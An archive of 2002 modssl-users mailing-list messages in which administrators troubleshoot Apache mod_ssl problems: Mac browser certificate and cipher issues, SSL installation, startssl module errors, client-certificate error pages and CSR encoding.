Subject: Macs not able to access 128bit Security sites?
Date: Tue, 27 Aug 2002 16:48:04 +1000
Message-ID: <25B12856E53F0047BE90FB2CFC0D1B59119635@rdsl_mlb_mx1.requestdsl.com.au>
Thread-Topic: Help Required!
Thread-Index: AcJM+cS5KpgdnzAXSdCp19cN11ZRHAAm1gIQ
From: "Vince Montuoro" 
To: 
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id IAA08693
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Vince Montuoro" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi guys,
Just wondered if anyone encountered issues with Macs not able to access 128 bit encrypted sites?  

(The Particular Mac in question is a Powerbook G3  )

I have also encountered problems with IE5 and IE6 where by the only way I could get access to the site was by upgrading the security patches on the IE version. Mac on the other hand has 128 bit encryption standard.

PLEASE HELP

Vince
vmontuoro@request.com.au
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 15:27:05 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18013; Tue, 27 Aug 2002 15:26:09 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from pop3.wellinx.com id PAA18009; Tue, 27 Aug 2002 15:25:56 +0200 (MET DST)
Received: from dhcp35.wellinx.com (dhcp35.wellinx.com [172.16.31.35])
	by pop3.wellinx.com (8.9.3/8.9.3) with ESMTP id IAA13844
	for ; Tue, 27 Aug 2002 08:25:18 -0500
X-RAV-AntiVirus: This e-mail has been scanned for viruses on host: pop3.wellinx.com
Subject: Re: Macs not able to access 128bit Security sites?
From: Ben Ricker 
To: Modssl List 
In-Reply-To: 
	<25B12856E53F0047BE90FB2CFC0D1B59119635@rdsl_mlb_mx1.requestdsl.com.au>
References: 
	<25B12856E53F0047BE90FB2CFC0D1B59119635@rdsl_mlb_mx1.requestdsl.com.au>
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8.99 
Date: 27 Aug 2002 08:25:18 -0500
Message-Id: <1030454718.1684.17.camel@dhcp35.wellinx.com>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Ben Ricker 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

The cipher is located within the browsers which is different then the
way Microsoft puts it in the system (hence the patch to upgrade the
cipher).

Anyway, I use IE 5.1 for Mac on OS9 and have no problem with 128-bit
sites. Are you using OSX?

Ben Ricker
Web Security System Administrator
Wellinx.com

On Tue, 2002-08-27 at 01:48, Vince Montuoro wrote:
> Hi guys,
> Just wondered if anyone encountered issues with Macs not able to access 128 bit encrypted sites?  
> 
> (The Particular Mac in question is a Powerbook G3  )
> 
> I have also encountered problems with IE5 and IE6 where by the only way I could get access to the site was by upgrading the security patches on the IE version. Mac on the other hand has 128 bit encryption standard.
> 
> PLEASE HELP
> 
> Vince
> vmontuoro@request.com.au
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 15:46:13 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id PAA18616; Tue, 27 Aug 2002 15:45:20 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from mail.kcmria.com id PAA18612; Tue, 27 Aug 2002 15:45:10 +0200 (MET DST)
Received: from site13 (unknown [192.168.1.25])
	by mail.kcmria.com (Postfix) with SMTP id 684FDB299A
	for ; Tue, 27 Aug 2002 09:46:46 -0400 (EDT)
Message-ID: <011401c24dcf$f0da42c0$1901a8c0@site13>
From: "Kenny G. Dubuisson, Jr." 
To: 
Subject: SSL Installation Documentation for Apache
Date: Tue, 27 Aug 2002 08:45:01 -0500
Organization: Keystone Capital Management
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: 7bit
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Kenny G. Dubuisson, Jr." 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hello all.  I'm new to this list.  I've got a couple of quick questions.
I'm trying to find documentation on how to install SSL for Apache 2.0.40.
I've been all over Apache's web site and found in-depth documentation about
how SSL works but no clear-cut way to install it (unless I just missed
something).  If someone could forward documentation on how to install SSL
for Apache 2.0.40 on Windows NT, I would greatly appreciate it.

Also, I would like to have Apache serve both SSL (port 443) and non-SSL
(port 80) requests.  Could someone forward info on how to setup Apache's
virtual hosting to do this?

Thanks,
Kenny



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 16:30:08 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19694; Tue, 27 Aug 2002 16:29:15 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id QAA19688; Tue, 27 Aug 2002 16:28:36 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 27 Aug 2002 10:28:29 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: Macs not able to access 128bit Security sites?
Date: Tue, 27 Aug 2002 10:28:28 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C24DD6.02DFD9C0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C24DD6.02DFD9C0
Content-Type: text/plain;
	charset="iso-8859-1"

I have an issue where MSIE on a MAC doesn't recognize the signer of the
Entrust certificate, however when you look at the signers in the security
preferences in MSIE (Mac OS 8.1 +, MSIE 5 +) The Entrust.net secure root is
there as well as GTE Cybertrust Root CA.. whom Entrust uses to chain to.

When the MAC MSIE browser connects .. users get a pop up saying .. "The
issuer of the certificate is unknown"

Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 PHP/4.0.4pl1

This is only happening with this particular server.  Works fine another
other Apache servers I have tested from a MAC MSIE.

Weird.



-----Original Message-----
From: Vince Montuoro [mailto:vmontuoro@request.com.au]
Sent: Tuesday, August 27, 2002 2:48 AM
To: modssl-users@modssl.org
Subject: Macs not able to access 128bit Security sites?


Hi guys,
Just wondered if anyone encountered issues with Macs not able to access 128
bit encrypted sites?  

(The Particular Mac in question is a Powerbook G3  )

I have also encountered problems with IE5 and IE6 where by the only way I
could get access to the site was by upgrading the security patches on the IE
version. Mac on the other hand has 128 bit encryption standard.

PLEASE HELP

Vince
vmontuoro@request.com.au
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C24DD6.02DFD9C0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable






RE: Macs not able to access 128bit Security sites?




I have an issue where MSIE on a MAC doesn't recognize =
the signer of the Entrust certificate, however when you look at the =
signers in the security preferences in MSIE (Mac OS 8.1 +, MSIE 5 +) =
The Entrust.net secure root is there as well as GTE Cybertrust Root =
CA.. whom Entrust uses to chain to.



When the MAC MSIE browser connects .. users get a pop =
up saying .. "The

issuer of the certificate is unknown"




Server: Apache/1.3.26 (Unix) AuthMySQL/2.20 =
PHP/4.0.4pl1




This is only happening with this particular =
server.  Works fine another other Apache servers I have tested =
from a MAC MSIE.



Weird.








-----Original Message-----

From: Vince Montuoro [mailto:vmontuoro@request.com.au=
]

Sent: Tuesday, August 27, 2002 2:48 AM

To: modssl-users@modssl.org

Subject: Macs not able to access 128bit Security =
sites?






Hi guys,

Just wondered if anyone encountered issues with Macs =
not able to access 128 bit encrypted sites?  




(The Particular Mac in question is a Powerbook =
G3  )




I have also encountered problems with IE5 and IE6 =
where by the only way I could get access to the site was by upgrading =
the security patches on the IE version. Mac on the other hand has 128 =
bit encryption standard.



PLEASE HELP




Vince

vmontuoro@request.com.au

_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C24DD6.02DFD9C0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 16:35:09 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id QAA19865; Tue, 27 Aug 2002 16:34:16 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from SOTTMXS01.entrust.com id QAA19860; Tue, 27 Aug 2002 16:33:53 +0200 (MET DST)
Received: by SOTTMXS01.entrust.com with Internet Mail Service (5.5.2653.19)
	id ; Tue, 27 Aug 2002 10:33:47 -0400
Message-ID: 
From: Robert Lagana 
To: "'modssl-users@modssl.org'" 
Subject: RE: Macs not able to access 128bit Security sites?
Date: Tue, 27 Aug 2002 10:33:45 -0400
MIME-Version: 1.0
X-Mailer: Internet Mail Service (5.5.2653.19)
Content-Type: multipart/alternative;
	boundary="----_=_NextPart_001_01C24DD6.BFDAC1C0"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Robert Lagana 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This message is in MIME format. Since your mail reader does not understand
this format, some or all of this message may not be legible.

------_=_NextPart_001_01C24DD6.BFDAC1C0
Content-Type: text/plain

Ben,

Can you try this site https://www.xe.com

Thanks,
Rob

-----Original Message-----
From: Ben Ricker [mailto:bricker@wellinx.com]
Sent: Tuesday, August 27, 2002 9:25 AM
To: Modssl List
Subject: Re: Macs not able to access 128bit Security sites?


The cipher is located within the browsers which is different then the
way Microsoft puts it in the system (hence the patch to upgrade the
cipher).

Anyway, I use IE 5.1 for Mac on OS9 and have no problem with 128-bit
sites. Are you using OSX?

Ben Ricker
Web Security System Administrator
Wellinx.com

On Tue, 2002-08-27 at 01:48, Vince Montuoro wrote:
> Hi guys,
> Just wondered if anyone encountered issues with Macs not able to access
128 bit encrypted sites?  
> 
> (The Particular Mac in question is a Powerbook G3  )
> 
> I have also encountered problems with IE5 and IE6 where by the only way I
could get access to the site was by upgrading the security patches on the IE
version. Mac on the other hand has 128 bit encryption standard.
> 
> PLEASE HELP
> 
> Vince
> vmontuoro@request.com.au
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org
> 


______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

------_=_NextPart_001_01C24DD6.BFDAC1C0
Content-Type: text/html
Content-Transfer-Encoding: quoted-printable






RE: Macs not able to access 128bit Security sites?




Ben,




Can you try this site https://www.xe.com




Thanks,

Rob




-----Original Message-----

From: Ben Ricker [mailto:bricker@wellinx.com]

Sent: Tuesday, August 27, 2002 9:25 AM

To: Modssl List

Subject: Re: Macs not able to access 128bit Security =
sites?






The cipher is located within the browsers which is =
different then the

way Microsoft puts it in the system (hence the patch =
to upgrade the

cipher).




Anyway, I use IE 5.1 for Mac on OS9 and have no =
problem with 128-bit

sites. Are you using OSX?




Ben Ricker

Web Security System Administrator

Wellinx.com




On Tue, 2002-08-27 at 01:48, Vince Montuoro =
wrote:

> Hi guys,

> Just wondered if anyone encountered issues with =
Macs not able to access 128 bit encrypted sites?  

> 

> (The Particular Mac in question is a Powerbook =
G3  )

> 

> I have also encountered problems with IE5 and =
IE6 where by the only way I could get access to the site was by =
upgrading the security patches on the IE version. Mac on the other hand =
has 128 bit encryption standard.



> 

> PLEASE HELP

> 

> Vince

> vmontuoro@request.com.au

> =
______________________________________________________________________

> Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

> User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

> Automated List =
Manager           =
;            =
;     majordomo@modssl.org

> 






_______________________________________________________________=
_______

Apache Interface to OpenSSL =
(mod_ssl)          &nb=
sp;        www.modssl.org

User Support Mailing =
List           &n=
bsp;          =
modssl-users@modssl.org

Automated List =
Manager           =
;            =
;     majordomo@modssl.org





------_=_NextPart_001_01C24DD6.BFDAC1C0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 17:36:21 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA21625; Tue, 27 Aug 2002 17:35:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from tcen-ul-mailsv00.telkom.co.za id RAA21615; Tue, 27 Aug 2002 17:35:02 +0200 (MET DST)
Received: from CNTRRA20-GTW01.telkom.co.za (CNTRRA20-GTW01.telkom.co.za [165.143.130.156])
	by tcen-ul-mailsv00.telkom.co.za (8.11.2/8.11.2/2002061301) with SMTP id g7RDfUa06309
	for ; Tue, 27 Aug 2002 15:41:30 +0200
Received: FROM CNTRRA20-XS00.telkom.co.za BY CNTRRA20-GTW01.telkom.co.za ; Tue Aug 27 15:41:28 2002 +0200
Received: from CNTRRA20-XS11.telkom.co.za ([165.143.131.216]) by CNTRRA20-XS00.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 27 Aug 2002 15:41:25 +0200
Received: from TYGRRA01-XS11.telkom.co.za ([165.148.21.97]) by CNTRRA20-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 27 Aug 2002 15:41:25 +0200
Received: from TYGRRA01-XCS00.telkom.co.za ([165.148.21.87]) by TYGRRA01-XS11.telkom.co.za with Microsoft SMTPSVC(5.0.2195.2966);
	 Tue, 27 Aug 2002 15:41:25 +0200
X-MimeOLE: Produced By Microsoft Exchange V6.0.5762.3
content-class: urn:content-classes:message
MIME-Version: 1.0
Content-Type: text/plain;
	charset="iso-8859-1"
Subject: rebuilding apache + mod-ssl - urgent pls
Date: Tue, 27 Aug 2002 15:41:25 +0200
Message-ID: 
Thread-Topic: rebuilding apache + mod-ssl - urgent pls
Thread-Index: AcJNz2/FYRAWDpPlSEiwRh7h8RLETA==
X-Priority: 1
Importance: high
From: "Jose Correia (J)" 
To: 
X-OriginalArrivalTime: 27 Aug 2002 13:41:25.0089 (UTC) FILETIME=[6FE8C510:01C24DCF]
Content-Transfer-Encoding: 8bit
X-MIME-Autoconverted: from quoted-printable to 8bit by opensource.ee.ethz.ch id RAA21620
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Jose Correia (J)" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi all

I needed to rebuild apache + mod-ssl 2.84 + open-ssl-0.9.6a on top of
my existing apache version 1.3.20. It all went fine and installed
nicely. After rebooting the machine and trying to start the service
with ssl (using /opt/apache/bin/apachectl startssl), I'm now getting
this:


Syntax error on line 224 of /opt/apache/conf/httpd.conf:
Cannot load /opt/apache/libexec/mod_rewrite.so into server:
/opt/apache/libexec/mod_rewrite.so: undefined symbol: dbm_fetch
/opt/apache/bin/apachectl startssl: httpd could not be started


Any ideas of a step I missed??

My errors.log file says:

"Tue Aug 27 14:55:13 2002] [error] mod_ssl: Init: Private key not
found (OpenSSL library error follows)
[Tue Aug 27 14:55:13 2002] [error] OpenSSL: error:0D084069:asn1
encoding routines:d2i_ASN1_SET:bad tag
[Tue Aug 27 14:55:13 2002] [error] OpenSSL: error:0D09D082:asn1
encoding routines:d2i_RSAPrivateKey:parsing
[Tue Aug 27 14:55:13 2002] [error] OpenSSL: error:0D09B00D:asn1
encoding routines:d2i_PrivateKey:ASN1 lib"

I'm using my previous server.crt and server.key and server.csr... must
I regenerate these using make certificate??

thanks a lot

Jose
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 17:38:26 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA21695; Tue, 27 Aug 2002 17:37:36 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via SMTP for 
	from mail.extromedia.net id RAA21644; Tue, 27 Aug 2002 17:36:25 +0200 (MET DST)
Received: (qmail 7183 invoked from network); 27 Aug 2002 15:27:13 -0000
Received: from ns1.extromedia.net (HELO borg.extromedia.net) (192.168.0.1)
  by 192.168.0.3 with SMTP; 27 Aug 2002 15:27:13 -0000
Subject: RE: Macs not able to access 128bit Security sites?
From: "Robert J. Pope" 
To: modssl-users@modssl.org
In-Reply-To: 
	
References: 
Content-Type: text/plain
Content-Transfer-Encoding: 7bit
X-Mailer: Ximian Evolution 1.0.8 
Date: 27 Aug 2002 11:34:30 -0400
Message-Id: <1030462470.1021.67.camel@borg.extromedia.net>
Mime-Version: 1.0
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Robert J. Pope" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Rob,

I thought I'd try it too. With MSIE 5.2.1(4717) On MacOS X (Jaguar), I
was successfully able to access the site and connected with via an
RC4-128 cipher. I also see you're using an Entrust cert as apposed to
Verisign... Interesting.

- Robert

On Tue, 2002-08-27 at 10:33, Robert Lagana wrote:
> Ben,
> 
> Can you try this site https://www.xe.com
> 
> Thanks,
> Rob
> 
> -----Original Message-----
> From: Ben Ricker [mailto:bricker@wellinx.com]
> Sent: Tuesday, August 27, 2002 9:25 AM
> To: Modssl List
> Subject: Re: Macs not able to access 128bit Security sites?
> 
> 
> The cipher is located within the browsers which is different then the
> way Microsoft puts it in the system (hence the patch to upgrade the
> cipher).
> 
> Anyway, I use IE 5.1 for Mac on OS9 and have no problem with 128-bit
> sites. Are you using OSX?
> 
> Ben Ricker
> Web Security System Administrator
> Wellinx.com
> 
> On Tue, 2002-08-27 at 01:48, Vince Montuoro wrote:
> > Hi guys,
> > Just wondered if anyone encountered issues with Macs not able to access
> 128 bit encrypted sites?  
> > 
> > (The Particular Mac in question is a Powerbook G3  )
> > 
> > I have also encountered problems with IE5 and IE6 where by the only way I
> could get access to the site was by upgrading the security patches on the IE
> version. Mac on the other hand has 128 bit encryption standard.
> > 
> > PLEASE HELP
> > 
> > Vince
> > vmontuoro@request.com.au
> > ______________________________________________________________________
> > Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> > User Support Mailing List                      modssl-users@modssl.org
> > Automated List Manager                            majordomo@modssl.org
> > 
> 
> 
> ______________________________________________________________________
> Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
> User Support Mailing List                      modssl-users@modssl.org
> Automated List Manager                            majordomo@modssl.org



______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Aug 27 20:20:30 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id UAA25451; Tue, 27 Aug 2002 20:19:29 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id UAA25438; Tue, 27 Aug 2002 20:18:56 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id A1E304CE749; Tue, 27 Aug 2002 20:18:54 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id D2850286B4; Tue, 27 Aug 2002 20:09:13 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from hydrogen.can-host.com id QAA20387; Tue, 27 Aug 2002 16:55:06 +0200 (MET DST)
Received: from dell02erich ([65.198.75.130])
	by hydrogen.can-host.com (8.11.6/8.11.6) with SMTP id g7REuJs17531
	for ; Tue, 27 Aug 2002 10:56:19 -0400
Message-ID: <01e201c24dda$276ab8b0$3064a8c0@dell02erich>
From: "Erich C. Beyrent" 
To: 
Subject: Help with install
Date: Tue, 27 Aug 2002 10:58:02 -0400
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="----=_NextPart_000_01DD_01C24DB8.9D27AEE0"
X-Priority: 3
X-MSMail-Priority: Normal
X-Mailer: Microsoft Outlook Express 6.00.2600.0000
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2600.0000
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Erich C. Beyrent" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

This is a multi-part message in MIME format.

------=_NextPart_000_01DD_01C24DB8.9D27AEE0
Content-Type: text/plain;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable

Hi everyone,

I am new to the list, and I have built Apache 1.3.26 on Solaris 8 with =
mod_ssl 2.8.10 and mod_perl 1.27.  There is no problem with apachectl =
start.

However, starting the SSL server produces the following error:

/opt/apache/bin/apachectl startssl
Syntax error on line 206 of /opt/apache/conf/httpd.conf:
Can't locate API module structure 'SSL' in file =
/opt/apache/libexec/libssl.so:
ld.so.1: /opt/apache/bin/httpd: fatal: SSL: can't find symbol


What have I done wrong?  Any assistance would be greatly appreciated.  =
Thanks!


Erich C. Beyrent


------=_NextPart_000_01DD_01C24DB8.9D27AEE0
Content-Type: text/html;
	charset="iso-8859-1"
Content-Transfer-Encoding: quoted-printable









Hi everyone,


 


I am new to the list, and I have built =
Apache=20
1.3.26 on Solaris 8 with mod_ssl 2.8.10 and mod_perl 1.27.  There =
is no=20
problem with apachectl start.


 


However, starting the SSL server =
produces the=20
following error:


 


/opt/apache/bin/apachectl =
startssl


Syntax error on line 206 of=20
/opt/apache/conf/httpd.conf:


Can't locate API module structure 'SSL' =
in file=20
/opt/apache/libexec/libssl.so:


ld.so.1: /opt/apache/bin/httpd: fatal: =
SSL: can't=20
find symbol


 


 


What have I done wrong?  Any =
assistance would=20
be greatly appreciated.  Thanks!


 


 


Erich C. =
Beyrent


------=_NextPart_000_01DD_01C24DB8.9D27AEE0--
______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 28 17:43:31 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id RAA14048; Wed, 28 Aug 2002 17:42:13 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from srrdc013dmz03.rdc.nl id RAA14042; Wed, 28 Aug 2002 17:42:05 +0200 (MET DST)
Received: from srrdc006srv02.services.rdc.net (srrdc006srv02.services.rdc.net [217.115.224.166])
	by srrdc013dmz03.rdc.nl (8.9.3+Sun/8.9.3) with ESMTP id KAA29161
	for ; Wed, 28 Aug 2002 10:59:58 +0200 (MET DST)
Received: from rdc.nl (pcrs.rdcka.rdc.net [172.31.1.24])
	by srrdc006srv02.services.rdc.net (8.9.3+Sun/8.9.3) with ESMTP id KAA05535
	for ; Wed, 28 Aug 2002 10:59:14 +0200 (MET DST)
Message-ID: <3D6C9118.2080509@rdc.nl>
Date: Wed, 28 Aug 2002 11:00:08 +0200
From: Danny Kruitbosch 
Organization: RDC Datacentrum BV
User-Agent: Mozilla/5.0 (Windows; U; WinNT4.0; en-US; rv:1.0.0) Gecko/20020530
X-Accept-Language: en-us, en
MIME-Version: 1.0
To: modssl-users 
Subject: Usefull error pages for users
X-Enigmail-Version: 0.62.4.0
X-Enigmail-Supports: pgp-inline, pgp-mime
Content-Type: text/plain; charset=us-ascii; format=flowed
Content-Transfer-Encoding: 7bit
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Danny Kruitbosch 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users

Hi,

I'm trying to figure out the following:

We're using client certs for authentication and the authentication works 
fine. But when a user connect and isn't able to present his cert of his 
cert is revoked he gets an 'DNS or server error' (IE 5.5/6.0). I would 
like to redirect this user to a custom error page saying something 
intelligent like:

"Certificate revoked"
"No certificate presented"
"Unable to verify certificate"

or server specific errors like:

CRL expired
Unable to verify certificate


How can I set this up?
(Is there a list of specific error codes SSL uses and can I use the 
ErrorDocument directive on this. If so where do I find this list of SSL 
error codes)

Thanks,

Danny

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Wed Aug 28 19:08:10 2002
Received: by en5.engelschall.com (Sendmail 8.9.2) for modssl-users-L
	id TAA16616; Wed, 28 Aug 2002 19:07:21 +0200 (MET DST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from visp.engelschall.com id TAA16271; Wed, 28 Aug 2002 19:06:17 +0200 (MET DST)
Received: by visp.engelschall.com (Postfix, from userid 1005)
	id 690244CE6E0; Wed, 28 Aug 2002 19:06:14 +0200 (CEST)
Received: by en1.engelschall.com (Postfix, from userid 10000)
	id 4630128698; Wed, 28 Aug 2002 19:03:49 +0200 (CEST)
Received: by en5.engelschall.com (Sendmail 8.9.2) via ESMTP for 
	from poe.poyntons.com.au id RAA13856; Wed, 28 Aug 2002 17:36:27 +0200 (MET DST)
Received: (from uucp@localhost)
	by poe.poyntons.com.au (8.8.8+Sun/8.8.8) id QAA06527
	for ; Wed, 28 Aug 2002 16:27:35 +0800 (WST)
Message-Id: 
X-Mailer: Novell GroupWise Internet Agent 6.0.2
Date: Wed, 28 Aug 2002 16:28:57 +0800
From: "James Bromberger" 
To: 
Subject: User Certificates: emailAddress type needs to be of type
	IA5STRING
Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Content-Disposition: inline
X-MESSAGE-TID: "PG1vZHNzbC11c2Vyc0Btb2Rzc2wub3JnPgoyMDAyMDgyOC0xNjI3MzQ="
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "James Bromberger" 
X-List-Manager: Majordomo [version 1.94.4]
X-List-Name: modssl-users


Hey all,

I know this is mod-ssl-users and not openssl-users, but I thought I'd
ask here anyway. I have a user cert I am trying to sign with my private
CA, and I am getting a problem with:

	Enter PEM pass phrase:
	Check that the request matches the signature
	Signature ok
	The Subjects Distinguished Name is as follows
	emailAddress          :ASN.1 12:'
	emailAddress type needs to be of type IA5STRING

The Subject of the CSR I am dealing with (altered to protect the
innocent):
	Subject: Email=xxxxxxx@yyyyyyy.com, C=AU, O=ZZ, OU=ZZZZZZ,
CN=ZZZZZZ

This CSR was generated using keytool from the J2SDK1.4.1 RC1
distribution from java.sun.com. Now, a CSR I generated with OpenSSL
gives me a format of "Subject Name=Val/Name=Val/...", not "Subject:
Name=Val, Name=Val, ...".

Does any one know what the ASN.1 encoding thing is all about here in
the CSR, and how it can be corrected with OpenSSL (0.9.6g-engine) at
signing time, and if the change of formatting (slash separated from
comma separated) of the Subject in the CSR is important? I tired to
override the CSR's subject by setting the subject with the same values
using '/" as the OID separator, but that didn't help.

Regards,

	James Bromberger

-- 
  James Bromberger,   Webmaster/Senior Systems Administrator
  Client Technical Services,  Hartleys Limited,  www.hartleys.com.au 
www.jdv.com
  P: +61 8 9268 2909        M: +61 417 322 500
  F: +61 8 9266 0200        E: james_bromberger@jdv.com

Hartleys Ltd ABN 67 009 136 029, its Directors and Associates declare
that they from time to time hold interests in/and or earn brokerage,
fees or other benefits mentioned in documents to clients.
Any securities recommendation contained in this document is unsolicited
general information only. Do not act on a recommendation without first
consulting your investment advisor to determine whether the
recommendation is appropriate for your investment objectives, financial
situation and particular needs.
Hartleys Limited believes that any information or advice (including any
securities recommendation) contained in this document is accurate when
issued. However, Hartleys Limited does not warrant its accuracy or
reliability. Hartleys Limited, its officers, agents and employees exclude
all liability whatsoever, in negligence or otherwise, for any loss or
damage relating to this document to the full extent permitted by law.
Hartleys Limited may collect information from you in order to provide
any services you have requested.  A copy of Hartleys Limited's privacy
policy is available on www.hartleys.com.au.
______________________________________________________________________
